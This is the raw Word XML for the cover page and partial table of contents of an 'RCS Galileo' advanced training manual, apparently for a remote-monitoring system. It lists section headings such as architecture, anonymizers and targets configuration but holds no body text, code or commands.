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105" w:rsidRDefault="00157949" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="00A01105" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="00A01105" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="00A01105" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="00A01105" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E835A0" w:rsidRDefault="00E835A0" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E835A0" w:rsidRDefault="00E835A0" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E835A0" w:rsidRDefault="00E835A0" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E835A0" w:rsidRDefault="00E835A0" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E835A0" w:rsidRDefault="00E835A0" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E835A0" w:rsidRDefault="00E835A0" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E835A0" w:rsidRDefault="00E835A0" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E835A0" w:rsidRDefault="00E835A0" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="00A01105" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="00A01105" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="00A01105" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68D1992E" wp14:editId="4BEE6322">
            <wp:extent cx="3725545" cy="660400"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="Macintosh HD:Users:daniele:Desktop:HT Documentation:Logo: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e:Desktop:HT Documentation:Logo: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5545" cy="660400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="004E3740" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="135DFEFF" wp14:editId="180C48D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2143125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>322580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4226400" cy="1224000"/>
            <wp:effectExtent l="0" t="0" r="317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alileo_Scritta.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4226400" cy="1224000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="00A01105" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F634E" w:rsidRDefault="002F634E" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F634E" w:rsidRDefault="002F634E" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F634E" w:rsidRDefault="002F634E" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F634E" w:rsidRDefault="002F634E" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE558C" w:rsidRDefault="00FE558C" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F634E" w:rsidRDefault="002F634E" w:rsidP="00A01105">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01105" w:rsidRDefault="007570C3" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced </w:t>
      </w:r>
      <w:r w:rsidR="004D027A">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Training</w:t>
      </w:r>
      <w:r w:rsidR="00D03E79">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006750BC">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manual</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B0D17" w:rsidRPr="005B0D17" w:rsidRDefault="005B0D17" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B0D17" w:rsidRDefault="005B0D17" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00415B22" w:rsidRDefault="00415B22" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00415B22" w:rsidRDefault="00415B22" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C7020" w:rsidRDefault="000C7020" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C7020" w:rsidRDefault="000C7020" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00415B22" w:rsidRPr="005B0D17" w:rsidRDefault="00415B22" w:rsidP="00A94FC9">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B0D17" w:rsidRPr="005B0D17" w:rsidRDefault="005B0D17" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B0D17" w:rsidRPr="005B0D17" w:rsidRDefault="005B0D17" w:rsidP="005B0D17">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B0D17">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B0D17" w:rsidRPr="005B0D17" w:rsidRDefault="005B0D17" w:rsidP="004D027A">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B0D17">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A87FEB" w:rsidRPr="005B0D17" w:rsidRDefault="004279FF" w:rsidP="005B0D17">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251772928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36CA1043" wp14:editId="00DE9BAE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:align>bottom</wp:align>
            </wp:positionV>
            <wp:extent cx="4060825" cy="2353310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>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lileo_Splash.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060825" cy="2353310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002F634E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="-881483392"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00F2724D" w:rsidRPr="00E1565C" w:rsidRDefault="00E1565C">
          <w:pPr>
            <w:pStyle w:val="Titolosommario"/>
            <w:rPr>
              <w:sz w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:t>Table of contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="003F3DE1" w:rsidRDefault="00F2724D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00351355">
            <w:rPr>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00351355">
            <w:rPr>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00351355">
            <w:rPr>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc372642474" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642474 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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475" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>RCS Galileo Architecture</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642475 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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76" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advanced Architecture and Systems Requirements</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642476 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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77" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Backend and Frontend Advanced Configuration (scripts)</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642477 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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78" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Anonymizers Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642478 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</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479" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Accounting and Operations</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642479 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11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0" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Users, Groups and Advanced Permissions Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642480 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11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1" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Operations and Targets Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642481 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</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482" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Intelligence</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642482 \h </w:instrText>
